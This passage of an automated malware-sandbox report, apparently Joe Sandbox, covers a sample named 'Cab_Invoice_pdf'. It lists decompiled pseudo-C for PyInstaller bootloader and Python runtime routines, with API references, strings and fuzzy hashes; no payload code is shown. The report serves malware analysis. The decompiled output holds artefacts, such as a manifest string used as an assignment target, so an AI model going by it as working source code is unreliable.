                            									_push(_t58);
                            									_t76 = E6E2F4A3C( *((intOrPtr*)(_t82 + 8)), _t72);
                            									 *(_t82 - 0x1c) = _t76;
                            									__eflags = _t72 - 1;
                            									if(_t72 == 1) {
                            										__eflags = _t76;
                            										if(_t76 == 0) {
                            											_push(_t58);
                            											_t45 = E6E2F4A3C( *((intOrPtr*)(_t82 + 8)), _t42);
                            											__eflags = _t58;
                            											_t25 = _t58 != 0;
                            											__eflags = _t25;
                            											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
                            											E6E2F4483(_t58, _t68, _t72);
                            											_pop(_t61);
                            											E6E2F463E( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
                            										}
                            									}
                            									__eflags = _t72;
                            									if(_t72 == 0) {
                            										L19:
                            										_t76 = E6E2F4329(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                            										 *(_t82 - 0x1c) = _t76;
                            										__eflags = _t76;
                            										if(_t76 != 0) {
                            											_t76 = E6E2F463E( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                            											 *(_t82 - 0x1c) = _t76;
                            										}
                            									} else {
                            										__eflags = _t72 - 3;
                            										if(_t72 == 3) {
                            											goto L19;
                            										}
                            									}
                            								}
                            							}
                            							 *(_t82 - 4) = 0xfffffffe;
                            							_t40 = _t76;
                            						} else {
                            							__eflags =  *0x6e3f8a48 - _t72; // 0x1
                            							if(__eflags > 0) {
                            								goto L9;
                            							} else {
                            								_t40 = 0;
                            							}
                            						}
                            						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
                            						return _t40;
                            					} else {
                            						E6E2F4A6A(E6E2F4BF5());
                            						E6E2F5058();
                            						"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS 
Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" & 0x00000000;
                            						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                            						E6E2F4518();
                            						_t54 = E6E2F4D96( *((intOrPtr*)(_t82 + 8)), 0);
                            						asm("sbb esi, esi");
                            						_t80 =  ~(_t54 & 0x000000ff) & 1;
                            						__eflags = _t80;
                            						 *(_t82 - 0x1c) = _t80;
                            						 *(_t82 - 4) = 0xfffffffe;
                            						E6E2F4525();
                            						_t56 = _t80;
                            						goto L4;
                            					}
                            				} else {
                            					_t56 = 0;
                            					L4:
                            					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
                            					return _t56;
                            				}
                            			}
















                            APIs
                            • __RTC_Initialize.LIBCMT ref: 6E2F44CA
                            • ___scrt_uninitialize_crt.LIBCMT ref: 6E2F44E4
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Initialize___scrt_uninitialize_crt
                            • String ID:
                            • API String ID: 2442719207-0
                            • Opcode ID: fefba9489bc703953f1b69f7fc4fdd4de40285b4b8159cd83f501498a4f16333
                            • Instruction ID: a3cfae28fe55ad21c2e6b4a76598b778ee7803f0f58aa04ba9670220c75ddbed
                            • Opcode Fuzzy Hash: fefba9489bc703953f1b69f7fc4fdd4de40285b4b8159cd83f501498a4f16333
                            • Instruction Fuzzy Hash: 3E41E672E8421DEFDF209FD5DE00BAEB7BAEF8575AF114519E81466240D7B08E038B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01324331(char _a4) {
                            				char _v8;
                            
                            				_t26 = _a4;
                            				_t52 =  *_a4;
                            				if( *_a4 != 0x1335190) {
                            					E013209EB(_t52);
                            					_t26 = _a4;
                            				}
                            				E013209EB( *((intOrPtr*)(_t26 + 0x3c)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x30)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x34)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x38)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x28)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x2c)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x40)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x44)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x360)));
                            				_v8 =  &_a4;
                            				E013241F7(5,  &_v8);
                            				_v8 =  &_a4;
                            				return E01324247(4,  &_v8);
                            			}




                            APIs
                            • _free.LIBCMT ref: 01324345
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01324351
                            • _free.LIBCMT ref: 0132435C
                            • _free.LIBCMT ref: 01324367
                            • _free.LIBCMT ref: 01324372
                            • _free.LIBCMT ref: 0132437D
                            • _free.LIBCMT ref: 01324388
                            • _free.LIBCMT ref: 01324393
                            • _free.LIBCMT ref: 0132439E
                            • _free.LIBCMT ref: 013243AC
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 1569baea8775124a8ccd759ef41fade24598740aa03c4a0c5b40bec9c3fd43d8
                            • Instruction ID: a34deb2c0a6f41a3edc958bb7818b9b1a17d5b04330505ef6cb35815d45663c1
                            • Opcode Fuzzy Hash: 1569baea8775124a8ccd759ef41fade24598740aa03c4a0c5b40bec9c3fd43d8
                            • Instruction Fuzzy Hash: 7811F876200519BFDB05FF59C882CDE3BB5EF15254B4140A2FA4A8F231DA31EE55DB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 64%
                            			E01313C70(void* __edx, char _a4, short _a36, signed int _a8228, intOrPtr _a8236, intOrPtr _a8240) {
                            				intOrPtr _v0;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t13;
                            				intOrPtr _t24;
                            				void* _t27;
                            				WCHAR* _t28;
                            				WCHAR* _t37;
                            				intOrPtr _t45;
                            				void* _t47;
                            				void* _t50;
                            				intOrPtr _t51;
                            				void* _t53;
                            				void* _t57;
                            				intOrPtr _t64;
                            				intOrPtr _t72;
                            				signed int _t74;
                            				void* _t75;
                            				void* _t76;
                            				void* _t77;
                            
                            				E01317880();
                            				_t13 =  *0x133c008; // 0xa212446c
                            				_a8228 = _t13 ^ _t74;
                            				_push(_t50);
                            				_t72 = _a8240;
                            				_v0 = _a8236;
                            				_push(_t57);
                            				if(_t72 == 0) {
                            					_t51 = _v0;
                            					L6:
                            					GetTempPathW(0x1000,  &_a36);
                            					E01314710(_t53,  &_a4, 0x10, L"_MEI%d", GetCurrentProcessId());
                            					_t75 = _t74 + 0x10;
                            					_t64 = 0;
                            					__eflags = 0;
                            					while(1) {
                            						_t58 = E0131F329( &_a36,  &_a4);
                            						_t24 = E01314B30();
                            						_t76 = _t75 + 0xc;
                            						__eflags = _t24;
                            						if(_t24 == 0) {
                            							break;
                            						}
                            						L01319803(_t58);
                            						_t64 = _t64 + 1;
                            						_t75 = _t76 + 4;
                            						__eflags = _t64 - 5;
                            						if(_t64 < 5) {
                            							continue;
                            						}
                            						__eflags = _t72;
                            						if(_t72 == 0) {
                            							L4:
                            							_t27 = 0;
                            							L18:
                            							E0131786A();
                            							return _t27;
                            						}
                            						_t37 = E01314BF0(0, "TMP", 0);
                            						__eflags = _t51;
                            						if(_t51 == 0) {
                            							_t68 = _t37;
                            							SetEnvironmentVariableW(_t37, 0);
                            							L01319803(_t68);
                            							_t77 = _t75 + 0x10;
                            							_t27 = 0;
                            						} else {
                            							_t61 = _t37;
                            							_t69 = E01314BF0(0, _t51, 0);
                            							E0131E1FC(_t37, _t40);
                            							L01319803(_t61);
                            							L01319803(_t69);
                            							L01319803(_t51);
                            							_t77 = _t75 + 0x2c;
                            							_t27 = 0;
                            						}
                            						goto L18;
                            					}
                            					E01314C90(_v0, _t58, 0x1000);
                            					L01319803(_t58);
                            					_t77 = _t76 + 0x10;
                            					__eflags = _t72;
                            					if(_t72 != 0) {
                            						_t28 = E01314BF0(0, "TMP", 0);
                            						__eflags = _t51;
                            						if(_t51 == 0) {
                            							_t66 = _t28;
                            							SetEnvironmentVariableW(_t28, 0);
                            							L01319803(_t66);
                            							_t77 = _t77 + 0x10;
                            						} else {
                            							_t60 = _t28;
                            							_t67 = E01314BF0(0, _t51, 0);
                            							E0131E1FC(_t28, _t31);
                            							L01319803(_t60);
                            							L01319803(_t67);
                            							L01319803(_t51);
                            							_t77 = _t77 + 0x2c;
                            						}
                            					}
                            					_t27 = 1;
                            					goto L18;
                            				}
                            				_push("TMP");
                            				_t45 = E01313E40(_t50, _t57);
                            				_push(_t72);
                            				_t51 = _t45;
                            				_t62 = E01313980();
                            				_t77 = _t74 + 8;
                            				if(_t46 == 0) {
                            					goto L4;
                            				}
                            				_t47 = E0131E1FC(L"TMP", _t62);
                            				L01319803(_t62);
                            				_t74 = _t77 + 0xc;
                            				_t83 = _t47;
                            				if(_t47 == 0) {
                            					goto L6;
                            				} else {
                            					_push("LOADER: Failed to set the TMP environment variable.\n");
                            					E01311910(_t83);
                            					_t77 = _t74 + 4;
                            					goto L4;
                            				}
                            			}

                            APIs
                            • GetTempPathW.KERNEL32(00001000,?,?,?,00000000,00000000,01313C46,?,00000000,?,pyi-runtime-tmpdir), ref: 01313CF9
                            • GetCurrentProcessId.KERNEL32 ref: 01313CFF
                              • Part of subcall function 01313E40: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,013124FE,_MEIPASS2), ref: 01313E76
                              • Part of subcall function 01313E40: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,013124FE,_MEIPASS2), ref: 01313E92
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01313D9C
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,?,?,00000000,0131210F,?,?), ref: 01313E11
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Environment$Variable$ByteCharMultiWide$CurrentExpandPathProcessStringsTemp
                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                            • API String ID: 2172272190-1116378104
                            • Opcode ID: 8dccca6c9b6972fef0d4222bb9183904a337ce3434b5dd969785da9e639c5b16
                            • Instruction ID: 24146a5e9725ad113699d02936d09b39c3f5bc0ac5f1ebc10a20bbd7c0cfa954
                            • Opcode Fuzzy Hash: 8dccca6c9b6972fef0d4222bb9183904a337ce3434b5dd969785da9e639c5b16
                            • Instruction Fuzzy Hash: EB413AB2A00302B7E32972BC9C45F6F799CAFA565CF090436FE089614AFA55990443F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_BadArgument.PYTHON38(east_asian_width,argument,a unicode character,?), ref: 6E2F1B33
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1B48
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F1C30
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: Xb/n\b/n`b/ndb/nhb/nlb/n$a unicode character$argument$east_asian_width
                            • API String ID: 3000140846-3419626597
                            • Opcode ID: 365f242b77d4e41ee5441f14888069f47d03d881b43e7d6960d67c10807f9a79
                            • Instruction ID: 1f19fcc1687440f2e4995d057c55acafde058ce0305bfa2b93742bd32611e712
                            • Opcode Fuzzy Hash: 365f242b77d4e41ee5441f14888069f47d03d881b43e7d6960d67c10807f9a79
                            • Instruction Fuzzy Hash: 05316BF27E407ACBE7044BADC841B29B7E3DB02626B484169E497CB246F324D49AC780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E01313980(short _a8192, signed int _a16384, intOrPtr _a16392) {
                            				short _v0;
                            				void* __edi;
                            				signed int _t14;
                            				signed int _t19;
                            				void* _t43;
                            				WCHAR* _t57;
                            				signed int _t58;
                            				WCHAR* _t65;
                            				signed int _t69;
                            				void* _t70;
                            				void* _t71;
                            				void* _t72;
                            				signed int _t73;
                            
                            				E01317880();
                            				_t14 =  *0x133c008; // 0xa212446c
                            				_a16384 = _t14 ^ _t69;
                            				_t57 = E01314BF0(0, _a16392, 0);
                            				_t70 = _t69 + 0xc;
                            				_t82 = _t57;
                            				if(_t57 != 0) {
                            					_t19 = ExpandEnvironmentStringsW(_t57,  &_a8192, 0x1000);
                            					L01319803(_t57);
                            					_t71 = _t70 + 4;
                            					__eflags = _t19;
                            					if(__eflags != 0) {
                            						_t65 = E0131D518(0,  &_a8192, 0x1000);
                            						_t72 = _t71 + 0xc;
                            						__eflags = _t65;
                            						if(__eflags != 0) {
                            							E01318520(_t57,  &_v0, 0, 0x2000);
                            							_push(0x5c);
                            							_push(_t65);
                            							_t58 = E013188E7(_t43);
                            							_t73 = _t72 + 0x14;
                            							__eflags = _t58;
                            							while(_t58 != 0) {
                            								E0131DC18( &_v0, _t65, (_t58 - _t65 >> 1) + 1);
                            								CreateDirectoryW( &_v0, 0);
                            								_t11 = _t58 + 2; // 0x2
                            								_push(0x5c);
                            								_t58 = E013188E7((_t58 - _t65 >> 1) + 1);
                            								_t73 = _t73 + 0x14;
                            								__eflags = _t58;
                            							}
                            							CreateDirectoryW(_t65, 0);
                            							__eflags = _a16384 ^ _t73;
                            							E0131786A();
                            							return _t65;
                            						} else {
                            							_push("LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n");
                            							E01311910(__eflags);
                            							__eflags = _a16384 ^ _t72 + 0x00000004;
                            							E0131786A();
                            							return 0;
                            						}
                            					} else {
                            						_push("LOADER: Failed to expand environment variables in the runtime-tmpdir.\n");
                            						E01311910(__eflags);
                            						__eflags = _a16384 ^ _t71 + 0x00000004;
                            						E0131786A();
                            						return 0;
                            					}
                            				} else {
                            					_push("LOADER: Failed to convert runtime-tmpdir to a wide string.\n");
                            					E01311910(_t82);
                            					E0131786A();
                            					return 0;
                            				}
                            			}

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,0131210F,?,?,00000000,?,00000000), ref: 013139E7
                            Strings
                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 013139B3
                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 013139FC
                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 01313A3F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentExpandMultiStringsWide
                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                            • API String ID: 2001182103-3498232454
                            • Opcode ID: 9ca12be93f24080f02b35f710f65d59386b7de3d6f414a36db91f98d293113d2
                            • Instruction ID: 0c432d8833810cf058dfe687b0fcf65ad26ba84c97e932b2e8611fcf4b7a2f74
                            • Opcode Fuzzy Hash: 9ca12be93f24080f02b35f710f65d59386b7de3d6f414a36db91f98d293113d2
                            • Instruction Fuzzy Hash: 3C31FEB2B403016BE238B2BCAC46F9FB389AF94664F440525FF49D7285F9749500C2DB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_Parse_SizeT.PYTHON38(?,s#:lookup,?,?), ref: 6E2F2416
                            • PyErr_SetString.PYTHON38(6E79EDB4,name too long), ref: 6E2F2441
                            • PyErr_Format.PYTHON38(6E79EDB4,undefined character name '%s',?), ref: 6E2F2475
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Err_$Arg_FormatParse_SizeString
                            • String ID: name too long$s#:lookup$undefined character name '%s'
                            • API String ID: 1087290140-1943843822
                            • Opcode ID: 4b80e46808847fd8085970197ceef6767d30595c20d8865b82151eb17a04872f
                            • Instruction ID: 20ff748829faf07d62064c2f33067d1e7e64d5729b999fcc0464a7c47bc288e8
                            • Opcode Fuzzy Hash: 4b80e46808847fd8085970197ceef6767d30595c20d8865b82151eb17a04872f
                            • Instruction Fuzzy Hash: 5921577159000CEFDF00DBD8EC899D9776EEB06315F0401A5ED0DD6211EB729A25CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_BadArgument.PYTHON38(bidirectional,argument,a unicode character,?), ref: 6E2F1773
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1788
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F1870
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: a unicode character$argument$bidirectional
                            • API String ID: 3000140846-2110215792
                            • Opcode ID: c3f33892bee27a1b6cb9742cf332d7439679058ceda2ca7cbc63a065feac3810
                            • Instruction ID: 6d2eef90eee9c9c1da3e7af903316e37d29297eadc6f7714a4bbd0669609ccea
                            • Opcode Fuzzy Hash: c3f33892bee27a1b6cb9742cf332d7439679058ceda2ca7cbc63a065feac3810
                            • Instruction Fuzzy Hash: 0D316DF2FA452ECFF7004BA9C941A2977E3DF06621B4841A4E45ACB246D324D48BC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_BadArgument.PYTHON38(mirrored,argument,a unicode character,?), ref: 6E2F19F3
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1A08
                            • PyLong_FromLong.PYTHON38(00000000), ref: 6E2F1AEA
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_ArgumentFromLongLong_ReadyUnicode_
                            • String ID: a unicode character$argument$mirrored
                            • API String ID: 4207899037-4001128513
                            • Opcode ID: acfccf6393175a2e8cd40721eb7821ed43f646a578940b073d1a373acfdd6f21
                            • Instruction ID: aa9238125f692bf4582264c952c3aef3da79b286b7b18306bf24d799be41b8b6
                            • Opcode Fuzzy Hash: acfccf6393175a2e8cd40721eb7821ed43f646a578940b073d1a373acfdd6f21
                            • Instruction Fuzzy Hash: 04316EF27F442ACBE70047ADC851B7AB3E6DF02656B884115E456CA286E324D4CAC7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E01314A10(void* __ecx, void* __edx, void* __eflags) {
                            				int* _t18;
                            				char* _t21;
                            				short* _t22;
                            				char* _t28;
                            				int* _t31;
                            				void* _t34;
                            				char* _t36;
                            				int* _t41;
                            				signed int _t42;
                            				signed int _t44;
                            				int _t45;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            
                            				_t34 = __edx;
                            				_t44 =  *(_t46 + 0x14);
                            				_push(4);
                            				_push(_t44 + 1);
                            				_t18 = E013197F8(__ecx);
                            				_t31 = _t18;
                            				_t47 = _t46 + 8;
                            				if(_t31 != 0) {
                            					_t36 = 0;
                            					__eflags = _t44;
                            					if(_t44 <= 0) {
                            						L16:
                            						_t31[_t44] = 0;
                            						return _t31;
                            					} else {
                            						_t41 = _t31;
                            						_t21 =  *(_t47 + 0x20) - _t31;
                            						__eflags = _t21;
                            						 *(_t47 + 0x20) = _t21;
                            						while(1) {
                            							_t22 = _t21[_t41];
                            							 *(_t47 + 0x30) = _t22;
                            							_t45 = WideCharToMultiByte(0xfde9, 0, _t22, 0xffffffff, 0, 0, 0, 0);
                            							__eflags = _t45;
                            							if(__eflags == 0) {
                            								break;
                            							}
                            							_t7 = _t45 + 1; // 0x1
                            							_push(1);
                            							_push(_t7);
                            							_t28 = E013197F8(_t7);
                            							_t47 = _t47 + 8;
                            							 *(_t47 + 0x14) = _t28;
                            							__eflags = _t28;
                            							if(__eflags == 0) {
                            								_push("Out of memory.");
                            								_push("win32_utils_to_utf8");
                            								goto L13;
                            							} else {
                            								__eflags = WideCharToMultiByte(0xfde9, 0,  *(_t47 + 0x24), 0xffffffff, _t28, _t45, 0, 0);
                            								if(__eflags == 0) {
                            									_push("Failed to encode wchar_t as UTF-8.\n");
                            									L12:
                            									_push("WideCharToMultiByte");
                            									L13:
                            									E01311860(_t34, __eflags);
                            									_t48 = _t47 + 8;
                            									 *_t41 = 0;
                            									_t42 = 0;
                            									__eflags = _t36;
                            									if(_t36 >= 0) {
                            										do {
                            											L01319803(_t31[_t42]);
                            											_t42 = _t42 + 1;
                            											_t48 = _t48 + 4;
                            											__eflags = _t42 - _t36;
                            										} while (_t42 <= _t36);
                            									}
                            									L01319803(_t31);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_t36 =  &(_t36[1]);
                            									_t44 =  *(_t47 + 0x1c);
                            									 *_t41 =  *(_t47 + 0x14);
                            									_t41 =  &(_t41[1]);
                            									__eflags = _t36 - _t44;
